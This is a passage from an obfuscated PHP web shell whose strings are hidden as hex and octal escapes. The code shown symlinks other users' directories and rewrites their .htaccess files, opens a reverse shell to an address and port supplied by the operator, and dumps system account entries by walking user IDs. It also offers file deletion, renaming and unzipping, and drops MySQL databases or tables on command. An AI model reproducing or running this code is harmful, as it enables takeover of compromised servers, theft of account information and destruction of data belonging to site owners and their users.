"\x2f\x73\x79\155\57" . $nothing["\156\141\155\x65"] . "\x2f\x2e\x68\164\141\143\143\x65\163\x73", "\x77"); fwrite($user_ht, $this->DFSRender("\x2f\45\173\165\163\x65\162\175\x25\x2f\x69", $GLOBALS["\x44\x46\103\x6f\x6e\x66\x69\x67"][1]["\144\146\163\x61\x76\145\x64"], $contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS["\x44\106\103\157\x6e\x66\151\x67"][1]["\160\141\164\x68"] . "\57\x73\171\155\57" . $nothing["\156\141\x6d\145"] . "\x2f" . $GLOBALS["\x44\106\x43\x6f\x6e\146\x69\x67"][1]["\x64\146\163\x61\166\145\x64"]); print "\x44\157\156\145\41\x20\x2d\x3e\x20" . $nothing["\x6e\x61\x6d\145"] . "\x20\55\x3e\40\x3c\141\x20\150\162\x65\146\75\47" . urldecode($dfsv) . "\x27\76\x4f\x70\x65\156\74\x2f\x61\x3e\x3c\x62\x72\76"; } } else { $targetpath = $this->DFSRender("\x2f\45\x7b\165\163\145\x72\x7d\45\57\151", $nothing["\x6e\141\x6d\145"], base64_decode(urldecode($GLOBALS["\104\106\103\157\x6e\x66\x69\x67"][1]["\164\x61\x72\147\145\164"]))); if (isset($targetpath)) { $this->DFSExecute("\154\156\x20\55\163\40" . $targetpath . "\x20" . $GLOBALS["\104\106\x43\x6f\x6e\x66\x69\147"][1]["\160\x61\x74\x68"] . "\x2f\x73\x79\155\x2f" . $nothing["\156\x61\155\x65"] . "\x2f" . $GLOBALS["\x44\106\x43\157\x6e\146\x69\x67"][1]["\x64\146\x73\141\x76\145\144"]); symlink($targetpath, $GLOBALS["\x44\x46\103\x6f\x6e\146\151\147"][1]["\x70\x61\x74\x68"] . "\57\163\171\155\57" . $nothing["\x6e\141\x6d\x65"] . "\57" . $GLOBALS["\x44\106\x43\157\x6e\x66\151\x67"][1]["\144\146\163\x61\x76\x65\144"]); $user_ht = fopen($GLOBALS["\104\x46\x43\157\x6e\x66\x69\x67"][1]["\x70\x61\164\150"] . "\57\163\171\x6d\x2f" . $nothing["\x6e\x61\155\145"] . "\x2f\56\150\x74\141\x63\x63\145\x73\x73", "\x77"); fwrite($user_ht, $this->DFSRender("\x2f\x25\x7b\x75\x73\145\162\x7d\45\57\x69", $GLOBALS["\104\106\x43\157\156\146\151\x67"][1]["\144\146\163\141\x76\145\x64"], $contents)); fclose($user_ht); $dfsv = urlencode($GLOBALS["\104\x46\103\x6f\x6e\x66\151\147"][1]["\160\141\x74\x68"] . "\x2f\x73\x79\x6d\x2f" . $nothing["\x6e\x61\155\145"] . "\57" . $GLOBALS["\x44\106\103\157\156\146\x69\147"][1]["\144\146\x73\141\x76\145\144"]); print "\x44\x6f\x6e\145\41\x20\x2d\x3e\x20" . $nothing["\x6e\141\x6d\x65"] . "\x20\x2d\76\x20\74\141\x20\x68\162\145\146\x3d\47" . urldecode($dfsv) . "\47\76\x4f\x70\145\x6e\x3c\57\x61\x3e\74\x62\162\76"; } } } } } else { echo "\x3c\x63\145\156\164\145\x72\76\x3c\146\157\x6e\x74\x20\143\x6f\x6c\x6f\x72\x3d\x27\x72\x65\x64\x27\40\x73\x69\172\145\75\x27\66\47\x3e\74\143\157\144\145\x3e\x4e\x6f\164\x20\x77\157\x72\153\x20\x69\x6e\40\x77\151\156\144\x6f\x77\41\x3c\x2f\x63\x6f\x64\x65\76\x3c\57\146\157\156\164\x3e\x3c\x2f\x63\x65\x6e\164\x65\162\x3e"; } } echo "\x3c\57\144\x69\166\76\x3c\57\163\x65\143\164\x69\x6f\x6e\x3e"; break; case "\x72\145\166\145\x72\163\145": $revhtml = explode("\174\174", $GLOBALS["\x44\x46\123\x79\156\x74\x61\x78"][0](self::$remote_url . "\57\157\164\x68\x65\x72\x73\x2e\x68\164\155\x6c"))[1]; echo "\x3c\x73\x65\x63\x74\151\157\156\40\143\x6c\141\163\163\x3d\x27\x72\x65\166\x65\x72\163\x65\47\x3e"; if (!isset($GLOBALS["\x44\x46\103\157\156\x66\151\147"][1]["\x64\x66\163\162\145\x76"])) { echo $revhtml; } else { echo $revhtml; echo "\74\143\x6f\144\x65\76"; $addr = trim($GLOBALS["\x44\x46\103\157\x6e\146\x69\147"][1]["\144\146\x73\x61\x64\144\x72"]); $port = trim($GLOBALS["\x44\106\103\157\156\146\151\x67"][1]["\x64\146\163\x70\x6f\x72\164"]); $this->DFSReverse($addr, $port); echo "\74\57\143\x6f\x64\x65\x3e"; } echo "\74\57\163\145\143\x74\151\157\156\76"; break; case "\x63\x6f\156\146": echo "\x3c\163\145\143\x74\x69\157\156\40\x63\154\x61\163\x73\75\47\x63\x6f\x6e\x66\x69\x67\163\47\76"; $pwid = array(); if ($GLOBALS["\104\x46\123\120\154\141\x74\146\x6f\162\155"] !== "\x77\x69\156") { for ($uid = 0; $uid < 4000; $uid++) { $nothing = posix_getpwuid($uid); if (!empty($nothing)) { array_push($pwid, $nothing["\x6e\141\x6d\145"] . "\x3a" . $nothing["\x70\x61\x73\163\x77\x64"] . "\x3a" . $nothing["\x75\x69\144"] . "\x3a" . $nothing["\147\151\x64"] . "\x3a" . $nothing["\x64\151\162"] . "\x3a" . $nothing["\x73\x68\145\x6c\154"]); } } foreach ($pwid as $conf) { print $conf . "\x3c\x62\162\76"; } } else { echo "\74\143\x65\156\x74\145\x72\x3e\116\157\x74\40\167\157\162\153\x20\x69\156\40\x77\151\x6e\144\157\x77\x21\x3c\57\x63\x65\x6e\164\x65\162\76"; } echo "\x3c\x2f\163\145\143\x74\x69\157\156\76"; break; case "\165\x6e\172\x69\x70": $from = $this->Dec($GLOBALS["\104\x46\x43\157\156\146\x69\147"][0]["\x64\146\160"]); $zipp = $this->Dec($GLOBALS["\104\x46\x43\157\156\x66\151\147"][0]["\x64\146\x66"]); echo "\x3c\x73\145\x63\x74\151\x6f\x6e\x20\x69\x64\75\47\x75\x6e\x7a\151\160\160\x69\x6e\147\47\76"; if (isset($GLOBALS["\104\x46\x43\x6f\156\x66\151\147"][1]["\144\145\163\x74\x69\x6e\141\164\x69\157\x6e"])) { $ziproc = new ZipArchive(); $pth = $from . $zipp; if ($ziproc->open($pth) === TRUE) { $ziproc->extractTo($GLOBALS["\104\x46\103\x6f\156\146\151\147"][1]["\x64\x65\163\164\151\156\x61\164\x69\x6f\156"]); $ziproc->close(); $this->DFSPopupMSG(3, null, "\106\151\154\x65\x20\x73\x75\143\143\x65\163\163\146\165\x6c\x6c\x79\x20\145\x78\164\162\141\143\164\x65\x64\x20\164\x6f\40\x64\145\x73\x74\151\156\x61\164\x69\x6f\x6e\41", null, false); } else { $this->DFSPopupMSG(4, null, "\106\x61\x69\x6c\x65\144\40\x74\157\x20\145\170\164\x72\x61\x63\x74\40\151\156\164\x6f\40\x64\x65\163\164\151\156\141\164\x69\157\156\x21", null, false); } } else { echo "\74\x63\145\x6e\164\145\162\76\74\x66\x6f\156\164\x20\143\157\x6c\x6f\x72\75\x27\167\x68\151\164\145\47\76\x46\151\x6c\145\x6e\x61\155\145\x20\x3a\x20" . $from . $zipp . "\74\57\x66\157\156\164\76"; echo "\74\164\x61\142\154\145\76\x3c\146\x6f\x72\x6d\x20\x61\143\164\151\x6f\156\x3d\x27\47\x20\x6d\x65\x74\150\x6f\144\75\47\x50\117\x53\x54\x27\x3e\x3c\164\162\x3e\x3c\x74\x64\76\74\x6c\x61\142\x65\x6c\76\x44\x65\x73\x74\151\x6e\x61\164\151\x6f\x6e\x20\x3a\40\x3c\57\154\x61\x62\x65\154\76\x3c\x2f\x74\144\x3e"; echo "\74\x74\x64\x3e\74\x69\x6e\x70\x75\x74\40\x74\171\x70\145\75\47\164\145\170\164\x27\40\156\x61\x6d\145\75\47\144\145\163\x74\x69\x6e\x61\164\x69\157\156\47\x3e\x3c\57\x74\x64\x3e\x3c\57\x74\x72\x3e\x3c\x74\162\76\x3c\x74\x64\76\x3c\57\164\144\x3e\x3c\x74\144\x3e\x3c\x62\x75\x74\x74\x6f\x6e\76\x55\156\172\x69\160\x3c\x2f\142\165\164\x74\x6f\156\76\x3c\57\x74\144\76"; echo "\74\x2f\x66\157\162\155\x3e\74\57\164\141\142\154\145\x3e\74\57\143\x65\x6e\x74\145\162\x3e"; } echo "\x3c\x2f\x73\145\x63\164\151\x6f\156\x3e"; break; case "\163\x63\x61\156\144": $slashtype = $this->DFSSlash(); $path = $this->Dec($this->query[0]) . $slashtype; $path = $this->Dec($this->DFSDirFilter($path)); $this->DFSCurrent($slashtype); echo "\x3c\x64\151\166\x20\x63\x6c\x61\163\x73\75\47\x64\151\162\x65\143\164\157\162\171\x27\76\x3c\x66\157\162\x6d\40\x61\x63\x74\x69\157\156\75\x27\x27\40\155\x65\164\x68\x6f\x64\75\x27\120\x4f\123\x54\x27\x3e"; echo "\x3c\164\141\x62\154\x65\76\74\164\150\x3e\120\151\x63\153\74\x2f\164\x68\x3e\x3c\x74\x68\76\124\x79\x70\x65\74\57\x74\x68\76\x3c\164\x68\76\116\141\x6d\145\74\x2f\x74\x68\76\x3c\164\150\x3e\x53\151\172\145\74\57\x74\150\76\74\164\150\x3e\117\x77\156\x65\162\x3a\107\162\x6f\x75\160\163\74\x2f\x74\150\x3e\74\164\150\76\x50\145\162\x6d\163\74\x2f\x74\150\76\74\x74\x68\76\x4d\157\x64\151\146\151\145\x64\x3c\x2f\164\x68\x3e\x3c\164\x68\76\x41\x63\x74\151\157\156\x3c\x2f\x74\x68\x3e"; $folder = array_diff(scandir($path), array("\x2e", "\56\56")); $files = scandir($path); foreach ($folder as $p) { if (is_dir($path . $slashtype . $p)) { $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered . $p; $uid = explode("\72", $this->DFSOG($filtered . $slashtype . $p)); echo "\x3c\160\x3e\x3c\x74\162\x3e\74\164\144\40\x69\x64\x3d\47\146\143\150\x65\143\153\x73\47\x3e\x3c\x69\156\160\x75\164\40\x74\171\160\145\x3d\x27\143\x68\145\x63\x6b\x62\157\x78\x27\40\x6e\141\x6d\145\x3d\47\164\x6f\132\x69\160\133\x5d\47\x20\166\141\154\165\x65\x3d\47" . urlencode($this->Enc()) . "\x7c\174\133\x6e\x6f\x76\x61\x6c\x75\145\135\x27\x3e\x3c\x2f\164\144\76\74\x2f\164\144\76"; echo "\74\164\x64\40\151\144\x3d\47\151\x63\157\156\x78\x27\x3e\74\151\40\x63\x6c\141\x73\163\75\x27\x66\141\x2d\162\145\147\x75\x6c\141\x72\x20\146\x61\x2d\146\157\x6c\x64\x65\162\47\76\74\57\151\76\x3c\57\x74\144\76\x3c\164\x64\x20\151\144\x3d\x27\164\142\x6e\x61\155\145\47\x3e\74\141\x20\x68\162\x65\146\75\47\77\144\146\160\x3d" . urlencode($this->Enc()) . "\x27\x3e{$p}\74\x2f\141\76\x3c\x2f\x74\144\x3e"; echo "\74\x74\x64\76\74\x2f\164\144\76"; echo "\74\x74\144\x20\151\x64\x3d\x27\x74\142\143\145\156\47\x3e" . $this->DFSOG($filtered . $slashtype . $p) . "\x3c\x2f\x74\144\x3e"; echo "\74\164\x64\x20\x69\144\x3d\47\x74\x62\x63\145\x6e\47\x3e\74\x61\40\150\x72\x65\x66\75\x27\77\144\x66\x70\75" . urlencode($this->Enc()) . "\46\144\146\141\x63\164\151\x6f\x6e\75\x63\x68\x6d\144\x27\76" . $this->DFSPerms($filtered . $slashtype . $p) . "\x3c\57\x61\76\74\57\x74\144\x3e"; echo "\x3c\x74\144\x20\151\144\x3d\47\164\142\143\145\x6e\x27\40\143\154\x61\x73\163\x3d\x27\x74\x62\x64\x61\x74\x65\47\x3e" . date("\x68\72\151\72\x73\x41\x28\x64\x2f\155\x2f\x59\51", filemtime($filtered . $slashtype . $p)) . "\x3c\x2f\164\x64\76"; echo "\74\x74\x64\40\151\x64\75\47\164\x62\x63\x65\x6e\x27\x3e\40\x3c\141\40\150\162\145\x66\75\x27\77\144\x66\x70\x3d" . urlencode($this->Enc()) . "\x26\144\146\141\143\x74\x69\x6f\156\75\x72\145\x6e\x27\76\x3c\x69\40\143\154\141\x73\x73\75\47\x66\141\x2d\x73\157\154\x69\144\40\x66\141\x2d\x70\x65\x6e\x27\76\74\57\x69\76\x3c\57\x61\76\x2e\x20\12\40\40\40\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\40\x20\74\x61\40\150\162\145\x66\x3d\x27\x3f\144\146\x70\x3d" . urlencode($this->Enc()) . "\x26\144\146\x61\143\164\151\157\156\75\x64\x65\154\47\76\74\x69\x20\143\154\141\x73\x73\x3d\x27\x66\141\55\x73\x6f\x6c\x69\144\x20\x66\x61\x2d\164\x72\x61\163\x68\x27\x3e\74\x2f\151\x3e\x3c\x2f\x61\x3e\74\x2f\x74\x64\x3e\x3c\x2f\x74\x72\x3e\74\57\160\x3e"; } } foreach ($files as $p) { if (is_file($path . $slashtype . $p)) { $filtered = $this->Dec($this->DFSDirFilter($path)); $this->string = $filtered; $dfp = $this->Enc(); $this->string = $p; $dff = $this->Enc(); $compressed = array("\x7a\151\160", "\x74\141\x72", "\147\172", "\x72\141\162"); $isZip = pathinfo($p, PATHINFO_EXTENSION); if (in_array($isZip, $compressed)) { $tname = $p . "\74\142\165\x74\164\157\x6e\40\163\x74\171\x6c\x65\75\x27\x62\157\x72\144\x65\x72\55\x72\x61\144\151\165\x73\72\70\160\170\x3b\142\x61\x63\153\x67\162\x6f\165\x6e\x64\72\157\162\x61\x6e\x67\x65\73\47\76\xa\40\40\40\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\40\x20\40\40\x3c\141\x20\163\164\x79\154\x65\75\x27\143\x6f\x6c\x6f\162\72\x62\154\141\143\153\x3b\x27\x20\x68\162\x65\x66\x3d\x27\x3f\x64\x66\160\x3d" . urlencode($dfp) . "\46\x64\x66\x66\x3d" . urlencode($dff) . "\46\x64\146\141\x63\x74\x69\157\x6e\x3d\x75\x6e\172\x69\x70\x27\76\xa\40\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x55\x4e\132\111\120\x20\x3c\x2f\x61\76\74\57\x62\x75\164\x74\x6f\156\x3e"; } else { $tname = $p; } echo "\x3c\160\x3e\x3c\164\x72\x3e\74\x74\x64\40\151\x64\x3d\x27\146\x63\x68\145\x63\x6b\x73\x27\x3e\74\151\156\x70\x75\x74\40\x74\x79\160\145\75\47\x63\150\145\x63\x6b\142\157\170\x27\x20\156\x61\155\x65\75\x27\164\x6f\x5a\x69\160\x5b\135\x27\x20\x76\141\x6c\x75\145\x3d\x27" . urlencode($dfp) . "\x7c\x7c" . urlencode($dff) . "\47\x3e\x3c\x2f\164\x64\76\x3c\57\x74\144\x3e"; echo "\x3c\x74\144\40\x69\x64\75\47\151\x63\157\x6e\170\47\x3e\x3c\151\x20\143\x6c\141\x73\x73\x3d\47\146\x61\x2d\x73\157\154\x69\144\40\x66\x61\55\x66\151\x6c\x65\x27\x3e\x3c\57\151\x3e\x3c\x2f\164\144\76\74\164\x64\x20\x69\144\x3d\47\x74\x62\x6e\141\x6d\145\x27\x3e\74\x61\40\150\162\145\146\x3d\47\77\x64\x66\x70\x3d" . urlencode($dfp) . "\x26\x64\146\x66\x3d" . urlencode($dff) . "\x27\x3e{$tname}\x3c\x2f\141\76\74\57\164\144\x3e"; echo "\74\164\144\x3e" . $this->DFSFormat(filesize($filtered . $p)) . "\x3c\57\164\144\x3e"; echo "\x3c\164\144\40\x69\144\x3d\x27\164\142\x63\145\x6e\47\x3e" . $this->DFSOG($filtered . $p) . "\x3c\57\x74\x64\x3e"; echo "\x3c\164\x64\40\x69\144\75\47\164\x62\143\x65\156\47\x3e\x3c\x61\x20\150\x72\145\x66\75\47\77\144\x66\160\x3d" . urlencode($dfp) . "\46\x64\146\146\x3d" . urlencode($dff) . "\46\x64\146\141\143\x74\151\157\156\75\x63\x68\155\144\47\x3e" . $this->DFSPerms($filtered . $p) . "\x3c\x2f\x61\76\74\x2f\x74\144\76"; echo "\x3c\164\x64\x20\151\144\x3d\47\x74\142\143\x65\x6e\47\x20\x63\x6c\141\x73\163\x3d\x27\164\x62\144\141\x74\145\x27\76" . date("\x68\x3a\151\x3a\x73\x41\50\x64\x2f\155\x2f\x59\x29", filemtime($filtered . $p)) . "\x3c\x2f\x74\144\x3e"; echo "\x3c\164\x64\40\x69\144\x3d\x27\164\142\x63\x65\x6e\x27\76\xa\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\74\141\x20\150\x72\145\146\x3d\x27\x3f\x64\146\160\x3d" . urlencode($dfp) . "\46\144\146\x66\x3d" . urlencode($dff) . "\46\144\146\x61\143\x74\151\x6f\x6e\x3d\145\x64\151\x74\x27\x3e\x3c\x69\40\x63\154\141\x73\163\75\47\x66\x61\55\x73\x6f\x6c\151\144\40\x66\x61\55\x66\x69\154\x65\x2d\163\151\147\x6e\x61\x74\x75\x72\x65\47\x3e\x3c\57\x69\x3e\x3c\57\141\76\x20\x2e\x20\xa\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\74\x61\x20\x68\162\145\146\75\47\77\144\x66\160\75" . urlencode($dfp) . "\x26\144\146\x66\x3d" . urlencode($dff) . "\46\144\146\141\143\164\151\157\156\75\x72\x65\x6e\47\76\x3c\151\40\x63\154\x61\x73\x73\75\x27\146\141\x2d\163\157\154\151\144\40\146\x61\55\x70\145\156\x27\76\x3c\x2f\151\x3e\x3c\57\141\x3e\x20\56\40\xa\x20\x20\x20\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\74\141\x20\150\x72\x65\x66\x3d\x27\x3f\x64\x66\160\x3d" . urlencode($dfp) . "\46\144\x66\146\x3d" . urlencode($dff) . "\46\144\146\x61\x63\164\x69\157\x6e\75\x64\x65\x6c\x27\76\x3c\151\x20\143\x6c\141\x73\x73\75\47\x66\x61\55\x73\157\x6c\151\x64\40\x66\141\55\164\162\141\x73\150\x27\76\74\x2f\151\76\x3c\x2f\141\x3e\x20\56\40\xa\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\74\x61\40\150\162\x65\x66\75\47\x3f\144\x66\x70\75" . urlencode($dfp) . "\46\144\x66\144\x3d" . urlencode($dff) . "\x26\144\x66\x61\143\164\151\x6f\x6e\x3d\144\157\x77\156\154\x6f\141\x64\x27\76\74\x69\x20\x63\154\141\x73\x73\x3d\47\x66\141\55\x73\157\154\151\144\40\x66\x61\55\x64\157\167\x6e\x6c\x6f\x61\144\47\x3e\74\57\151\76\x3c\x2f\141\x3e\x3c\57\x74\144\76\x3c\57\164\x72\x3e\74\57\160\76"; } } echo "\x3c\x2f\164\x61\x62\154\x65\76\xa\40\x20\40\40\40\40\40\40\x20\x20\40\40\40\x20\40\x20\74\144\151\x76\40\151\144\75\x27\x61\156\141\x63\x74\47\x3e\12\xa\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x3c\x73\145\x6c\x65\x63\164\40\x6e\x61\155\145\x3d\47\x73\145\154\145\143\x74\101\143\x74\x69\x6f\156\47\76\12\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\74\x6f\x70\164\151\x6f\x6e\x20\x76\x61\x6c\x75\145\75\x27\x27\x3e\55\x2d\x20\x41\143\164\151\157\156\x20\55\x2d\74\x2f\157\x70\164\151\x6f\x6e\x3e\12\x20\40\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\x3c\x6f\160\164\x69\157\x6e\40\166\141\x6c\165\x65\75\x27\132\151\x70\47\x3e\x2d\x2d\40\132\151\160\x20\x2d\x2d\74\57\157\160\x74\151\157\x6e\x3e\12\x20\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\x3c\157\160\164\151\x6f\x6e\40\166\x61\154\165\x65\75\x27\x44\145\154\145\164\x65\47\x3e\55\55\x20\x44\x65\154\145\164\145\40\55\x2d\74\x2f\157\160\x74\x69\x6f\156\x3e\12\40\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\x3c\x2f\x73\x65\x6c\x65\143\164\x3e\xa\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\40\x20\74\x69\x6e\x70\x75\164\40\164\x79\x70\145\75\x27\x73\x75\142\x6d\x69\x74\x27\x20\166\x61\x6c\165\x65\x3d\x27\123\x75\x62\x6d\x69\164\47\x3e\12\x20\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\x20\40\x3c\57\x64\151\x76\76\74\x2f\146\157\162\155\76\74\x2f\144\x69\x76\76"; break; case "\x64\145\x6c": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1] ?: ''); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (is_file($pathfile)) { if (unlink($pathfile)) { $this->DFSPopupMSG(3, null, "\106\x69\x6c\x65\40\x53\x75\143\143\x65\x73\x73\x66\x75\154\x6c\x79\x20\x64\x65\154\145\x74\145\x64\41", null, false); } else { $this->DFSPopupMSG(4, null, "\120\145\x72\x6d\151\x73\163\151\157\x6e\x20\144\x65\156\x69\145\144\41", null, false); } } else { if (is_dir($pathfile)) { if (rmdir($pathfile)) { $this->DFSPopupMSG(3, null, "\x44\151\x72\x65\x63\x74\157\x72\171\x20\x53\165\x63\x63\x65\163\163\x66\165\154\154\x79\x20\144\x65\154\145\164\145\x64\x21", null, false); } else { $this->DFSPopupMSG(4, null, "\120\145\x72\x6d\x69\x73\163\151\157\x6e\x20\144\x65\x6e\151\x65\144\x21", null, false); } } } break; case "\x72\x65\156": $slashtype = $this->DFSSlash(); $pathfile = $this->Dec($this->query[0]) . $this->Dec($this->query[1]); $pathfile = $this->Dec($this->DFSDirFilter($pathfile)); if (getcwd() == $pathfile) { $GLOBALS["\104\x46\x53\x79\156\x74\141\x78"][3]($GLOBALS["\x44\x46\103\157\x6e\x66\x69\147"][2]["\104\117\103\x55\115\x45\116\x54\137\x52\117\117\124"]); } echo "\x3c\x73\145\x63\x74\x69\x6f\x6e\x20\151\144\x3d\47\x64\x66\163\x72\x65\x6e\x61\155\145\x27\x3e"; if (isset($GLOBALS["\x44\x46\103\157\x6e\x66\151\147"][1]["\x6e\x65\x77\146\x69\154\x65"])) { if (file_exists($pathfile)) { $dfsRen = preg_replace("\x2f" . basename($pathfile) . "\57\x69", $GLOBALS["\104\x46\103\157\156\x66\151\147"][1]["\156\x65\x77\x66\x69\x6c\145"], $pathfile); if (rename($pathfile, $dfsRen)) { $this->DFSPopupMSG(5, '', "\106\151\x6c\x65\40\163\x75\143\x63\x65\x73\163\146\165\154\154\x79\x20\x72\145\x6e\x61\155\x65\x64\41", '', true); echo "\74\x73\x63\162\x69\160\x74\x3e\163\145\164\x54\151\x6d\145\157\165\164\50\x66\165\156\x63\x74\x69\x6f\156\50\x29\173\40\x77\151\156\x64\x6f\x77\x2e\x6c\157\143\x61\x74\151\157\156\56\x72\145\160\154\141\x63\x65\50\x27\x3f\144\x66\160\75" . urlencode($GLOBALS["\104\106\103\157\x6e\146\151\x67"][1]["\x72\145\146\x6c\x69\156\x6b"]) . "\47\51\x20\175\54\61\65\60\x30\51\73\74\x2f\x73\x63\162\x69\x70\x74\76"; } else { $this->DFSPopupMSG(4, null, "\x50\x65\162\155\x69\x73\163\151\157\x6e\x20\144\x65\x6e\x69\x65\x64\41", null, true); } } else { $this->DFSPopupMSG(4, null, "\x4e\x6f\x20\163\x75\143\x68\x20\146\x69\x6c\x65\x2f\144\x69\162\145\143\164\x6f\x72\x79\x21", null, true); } } else { $dfsren = preg_replace("\57" . basename($pathfile) . "\57\151", '', $pathfile); $this->string = $dfsren; echo "\x3c\x66\x6f\162\x6d\40\x61\x63\164\x69\157\x6e\75\x27\x27\x20\155\145\164\150\x6f\144\75\x27\120\117\x53\x54\x27\76\xa\40\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\x20\x20\74\x69\156\160\165\164\40\x74\171\x70\145\75\x27\x68\x69\144\x64\x65\x6e\x27\40\x6e\141\155\x65\75\x27\162\x65\146\x6c\x69\156\x6b\x27\40\x76\141\154\165\145\75\x27" . $this->Enc() . "\x27\x3e\xa\x20\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\74\164\141\x62\154\x65\76\x3c\x74\162\76\x3c\x74\x64\x3e\xa\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\40\40\x20\x3c\154\141\142\145\154\x3e\106\165\x6c\154\x20\x70\141\x74\x68\x20\x3a\40\x3c\x2f\x6c\141\142\x65\x6c\76\74\x2f\x74\x64\x3e\x3c\x74\x64\76\12\40\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x3c\154\141\x62\145\154\76" . $pathfile . "\x20\74\x2f\154\141\142\145\154\76\74\57\x74\x64\76\74\57\x74\x72\x3e\74\164\x72\76\12\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x3c\164\x64\x3e\74\x6c\141\142\145\x6c\x3e\x4e\x65\167\x20\156\x61\155\145\40\x3a\x20\x3c\57\154\141\x62\x65\154\x3e\x3c\x2f\x74\x64\x3e\74\x74\144\x3e\12\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\40\x20\x3c\151\156\x70\x75\x74\40\x74\171\160\145\75\x27\164\145\170\164\47\40\x6e\141\155\x65\75\x27\x6e\x65\x77\146\x69\x6c\145\47\x20\160\x6c\141\143\x65\150\x6f\154\144\145\162\75\x27" . basename($pathfile) . "\47\x3e\74\x2f\164\144\x3e\x3c\x2f\164\x72\x3e\74\164\x72\76\12\x20\40\x20\x20\x20\40\40\40\x20\40\40\40\40\40\x20\40\40\40\x20\40\74\x74\144\76\x3c\x2f\164\144\x3e\74\164\x64\x3e\x3c\151\156\x70\165\164\40\164\x79\x70\145\x3d\47\163\x75\142\155\151\x74\x27\x20\x76\x61\154\165\145\x3d\x27\122\x65\x6e\x61\x6d\x65\47\76\74\57\164\x72\x3e\xa\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\74\x2f\164\x61\x62\x6c\145\76\74\57\x66\157\162\155\x3e"; } echo "\x3c\57\163\x65\x63\x74\151\x6f\x6e\76"; break; case "\x73\161\x6c": echo "\74\163\145\x63\164\151\157\156\40\143\154\x61\x73\x73\75\47\144\141\164\141\142\x61\x73\145\163\47\76"; if (isset($_SESSION["\163\161\x6c\x5f\x61\x75\164\x68"])) { $sqldat = explode("\174\x2d\55\174", $_SESSION["\163\161\154\x5f\x61\x75\164\x68"]); $conn = mysqli_connect($sqldat[0], $sqldat[1], $sqldat[2]); if (isset($GLOBALS["\104\106\x43\157\x6e\146\x69\147"][1]["\157\x74\x68\145\162"])) { $this->DFSPopupMSG(1, "\x47\145\x74\x20\101\144\155\151\x6e\x65\x72", "\x50\154\145\x61\x73\145\x20\147\145\x74\40\141\144\x6d\x69\x6e\145\x72\x20\x66\162\157\155\40\154\151\x6e\x6b\40\x62\145\154\157\167", "\74\x61\x20\x68\x72\145\146\x3d\x5c\47\x68\164\x74\x70\163\72\x2f\57\x67\x69\164\x68\165\142\56\143\x6f\x6d\57\x76\162\x61\156\141\57\141\144\155\151\156\x65\x72\x2f\x72\x65\x6c\145\141\x73\145\163\x2f\x64\157\x77\x6e\154\157\141\x64\57\166\64\56\70\x2e\x31\x2f\141\144\155\x69\156\145\x72\55\64\56\70\56\61\x2d\155\171\x73\x71\x6c\x2d\145\x6e\56\x70\x68\160\x5c\x27\76\101\144\x6d\x69\156\145\162\x3c\57\x61\76", true); } else { if (isset($GLOBALS["\104\106\103\157\156\146\151\x67"][1]["\x73\161\x6c\144\x72\x6f\x70"])) { $ftar = array("\47", "\x22"); if (!isset($GLOBALS["\104\x46\103\x6f\x6e\x66\x69\x67"][0]["\x74\142\x6e\141\155\145"])) { mysqli_select_db($conn, $GLOBALS["\104\x46\103\157\x6e\x66\151\x67"][0]["\x64\142\156\x61\x6d\145"]); $dropping = str_replace($ftar, '', $GLOBALS["\104\106\x43\157\x6e\146\151\147"][0]["\144\142\x6e\x61\155\x65"]); $dropsql = "\104\122\117\x50\x20\x44\101\x54\x41\x42\x41\123\x45\40{$dropping}"; $query = mysqli_query($conn, $dropsql) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "\x44\141\164\x61\x62\141\x73\145\x20\x44\x52\117\x50\120\105\x44\41", null, false); } else { mysqli_select_db($conn, $GLOBALS["\104\106\103\157\156\146\151\x67"][0]["\144\x62\156\141\x6d\145"]); $dropping = str_replace($ftar, '', $GLOBALS["\104\106\103\157\x6e\x66\x69\x67"][0]["\164\142\x6e\x61\155\x65"]); $dropsql = "\104\122\117\x50\40\x54\x41\102\x4c\x45\x20{$dropping}"; $query = mysqli_query($conn, $dropsql) or die(mysqli_error($conn)); $this->DFSPopupMSG(3, null, "\x54\x61\142\x6c\145\x20\104\122\x4f\120\120\105\104\x21", null, false); } } else { if (isset($GLOBALS["\104\x46\x43\157\156\146\x69\x67"][1]["\x73\161\x6c\143\157\x6d\x6d\141\156\144\163"])) { if (isset($GLOBALS["\x44\106\103\x6f\156\x66\151\x67"][0]["\x64\142\x6e\x61\x6d\145"])) { mysqli_select_db($conn, 